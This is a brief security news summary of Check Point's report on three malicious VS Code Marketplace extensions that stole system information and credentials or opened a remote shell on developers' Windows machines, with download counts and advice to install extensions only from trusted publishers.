Go to listing page

Malicious VSCode Extensions: Password Theft and Remote Shell Exploits

Malicious VSCode Extensions: Password Theft and Remote Shell Exploits
Check Point discovered multiple malicious extensions on Microsoft’s Visual Studio Code Marketplace through which threat actors could steal valuable information.

The VSCode Marketplace is a widely used and freely available source code editor. It offers developers an efficient and customizable coding environment, supporting various programming languages, frameworks, and tools.

Diving into details

VSCode Marketplace, where users can find and download extensions to enhance their coding experience, has recently become a target for cybercriminals.
  • Researchers revealed that the compromised extensions were downloaded by Windows developers a total of 46,600 times.
  • The malware provided threat actors with unauthorized access to victim machines, enabling them to pilfer credentials, collect system information, and establish a remote shell on the victim's machine.

What were the extensions?

  • Theme Dracula Dark - This extension was primarily designed to enhance color consistency in the Dracula theme for VS Code. However, alongside its intended functionality, the extension executed unauthorized actions by collecting basic system information from developers' machines. This included details such as the hostname, operating system, CPU platform, total memory, and CPU information. Notably, the extension garnered significant popularity, with over 45,000 downloads by users.
  • Python-vscode - This extension attracted 1,384 downloads, despite lacking a description and being uploaded by a user with the name 'testUseracc1111’. Upon code analysis, it was discovered that the extension serves as a C# shell injector, allowing the execution of code or commands on the victim's machine. This indicates malicious intent behind the extension, as it provides unauthorized access and control over the compromised system.
  • Prettiest java - The extension in question appears to have been designed to imitate the well-known code formatting tool called 'prettier-java,' as suggested by its name and description. The extension pilfered stored credentials or authentication tokens from various applications, including Discord, Discord Canary, Google Chrome, Opera, Brave, and Yandex. The stolen information was then transmitted to the attackers using a Discord webhook. Despite its malicious nature, the extension managed to amass 278 installations, potentially putting a significant number of users at risk.

The bottom line

Software repositories that allow user contributions, including npm and PyPI, pose major supply chain security risks. Check Point's recent findings highlight that malicious submissions targeting Windows developers are becoming prevalent, mirroring the patterns observed in other software repositories. To mitigate these risks, users of the VSCode Marketplace and similar user-supported repositories are strongly advised to exercise caution. It is recommended to exclusively install extensions from trusted publishers with a substantial number of downloads and positive community ratings.
Cyware Publisher

Publisher

Cyware